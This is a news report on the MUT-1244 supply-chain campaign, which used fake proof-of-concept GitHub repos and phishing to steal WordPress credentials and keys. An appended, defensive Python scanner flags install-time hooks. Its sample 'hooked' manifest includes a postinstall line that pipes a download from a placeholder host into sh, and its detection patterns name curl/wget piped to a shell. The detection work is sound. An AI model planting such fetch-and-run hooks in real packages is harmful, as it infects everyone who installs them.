More than 390,000 credentials to WordPress sites were compromised in a year-long supply chain attack that leveraged a phishing campaign that targeted thousands of academic researchers and a large number of trojanized GitHub repos, mainly fake proof-of-concept (POC) exploits.
Datadog Security Labs said in a Dec. 13 post that these methods were designed to deliver a sophisticated second-stage payload capable of dropping cryptocurrency miners and stealing system information.
Dubbed MUT-1244 (short for “mysterious unattributed threat”), the attack touched only a small percentage of the more than 800 million WordPress sites, but was noteworthy because it targeted security pros such as pentesters and threat researchers, as well as threat actors who had acquired the credentials illegally.
The Datadog researchers said hundreds of MUT-1244 victims were and still are being compromised, pointing out that sensitive data such as SSH private keys and Amazon Web Services (AWS) access keys were exfiltrated.
Jason Soroko, senior fellow at Sectigo, explained that the attackers set up dozens of GitHub repositories with fake PoC exploits. Victims who were security pros, red teamers and threat actors then unknowingly installed malicious second-stage payloads that stole credentials and keys. Simultaneously, a phishing campaign tricked targets into installing a fake kernel update.
“These trojanized repos looked legitimate, often appearing in trusted threat intelligence feeds,” said Soroko. “By downloading and running this code, victims essentially infected themselves. This supply chain attack compromised the normal software acquisition process. Instead of attacking targets directly, the attackers poisoned the sources victims relied on to obtain tools and exploits.”
Itzik Alvas, co-founder and CEO of Entro Security, added that the MUT-1244 attackers successfully compromised the supply chains of various enterprises' code by creating repositories of code with legitimate-sounding names and functional uses that were then inherited as dependencies by many developers.
“These code dependencies came bundled with a trojanized password checker that recorded passwords as they were input by users into websites that inherit these dependencies,” explained Alvas. “Because this attack leverages dependencies in the supply chain the campaign has gone undetected for a year, compromising an estimated 390,000 credentials.”
Stephen Kowski, Field CTO at SlashNext Email Security, said this attack targeted the software development pipeline by corrupting widely used libraries and tools. Kowski said the malicious code could spread to numerous downstream applications and systems once installed.
“This campaign highlights why teams must examine all code, even from trusted sources,” said Kowski. “Advanced threat detection tools that spot malicious code patterns and suspicious behaviors in real-time help reduce these risks. Organizations benefit from automated security scanning solutions that analyze dependencies and identify potential threats before they spread through the software supply chain.”
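The dependency-scanning check Kowski describes can be made concrete. The script below is an added example, not code from the article, from Datadog's report or from any of the vendors quoted: it audits two common manifest types (an npm package.json and a Python setup.py) for install-time hooks that execute code, since a package that runs a command during installation is the point at which a trojanized dependency or fake PoC repo gets its payload onto a victim's machine. The pattern lists and the sample manifests are constructed for illustration; the hook names (preinstall, install, postinstall, prepare) are real npm lifecycle events, and cmdclass is the real setuptools mechanism for overriding the install step.

```python
"""
Added example (not part of the article or Datadog's report): a small
pre-install audit that flags dependency manifests whose install-time
hooks could run arbitrary code, the kind of check an automated
dependency scanner performs before a package reaches a build pipeline.
The sample manifests below are constructed for illustration.
"""
import json
import re

# npm lifecycle scripts that run automatically during `npm install`.
NPM_INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Patterns that commonly indicate "download and execute" behaviour in a hook.
SUSPICIOUS_SHELL = re.compile(
    r"(curl|wget)\b.*\|\s*(ba)?sh"      # pipe a download straight into a shell
    r"|base64\s+(-d|--decode)"          # decode an embedded payload
    r"|node\s+-e\s"                     # inline JavaScript evaluation
    r"|https?://",                      # any remote fetch at install time
    re.IGNORECASE,
)


def audit_package_json(text: str) -> list[str]:
    """Return findings for an npm package.json string (empty list = nothing flagged)."""
    findings = []
    manifest = json.loads(text)
    scripts = manifest.get("scripts", {})
    for hook, command in scripts.items():
        if hook not in NPM_INSTALL_HOOKS:
            continue
        # Any install-time hook deserves review; a download-and-run hook is high risk.
        severity = "high" if SUSPICIOUS_SHELL.search(command) else "medium"
        findings.append(f"{severity}: '{hook}' runs at install time: {command}")
    return findings


# setup.py constructs that let a package run code during `pip install`.
SETUP_PY_RED_FLAGS = [
    (re.compile(r"cmdclass\s*="), "custom install command (cmdclass) overrides pip's install step"),
    (re.compile(r"\b(subprocess|os\.system|os\.popen)\b"), "spawns a process during packaging/install"),
    (re.compile(r"\b(urllib|requests|socket)\b"), "performs network I/O during packaging/install"),
    (re.compile(r"\bexec\s*\(|\beval\s*\("), "evaluates dynamically built code"),
]


def audit_setup_py(text: str) -> list[str]:
    """Return findings for a setup.py source string (empty list = nothing flagged)."""
    findings = []
    for pattern, why in SETUP_PY_RED_FLAGS:
        if pattern.search(text):
            findings.append(f"high: {why}")
    return findings


# --- Constructed sample manifests (hypothetical packages, not real ones) ---
CLEAN_PACKAGE_JSON = json.dumps({
    "name": "example-clean",
    "version": "1.0.0",
    "scripts": {"test": "node test.js", "build": "tsc"},
})

HOOKED_PACKAGE_JSON = json.dumps({
    "name": "example-hooked",
    "version": "1.0.0",
    "scripts": {
        "postinstall": "curl -s http://PLACEHOLDER.invalid/x | sh",  # placeholder host
        "test": "node test.js",
    },
})

CLEAN_SETUP_PY = "from setuptools import setup\nsetup(name='example-clean', version='1.0.0')\n"

HOOKED_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        subprocess.call(["sh", "-c", "echo placeholder"])

setup(name="example-hooked", version="1.0.0", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, result in [
        ("clean package.json", audit_package_json(CLEAN_PACKAGE_JSON)),
        ("hooked package.json", audit_package_json(HOOKED_PACKAGE_JSON)),
        ("clean setup.py", audit_setup_py(CLEAN_SETUP_PY)),
        ("hooked setup.py", audit_setup_py(HOOKED_SETUP_PY)),
    ]:
        print(label, "->", result or ["no install-time hooks flagged"])
```

A check like this belongs in front of the package, not behind it: run it against every new or updated dependency before the build pipeline installs it, and treat any "high" finding as a reason to read the package source rather than trusting its name or its README.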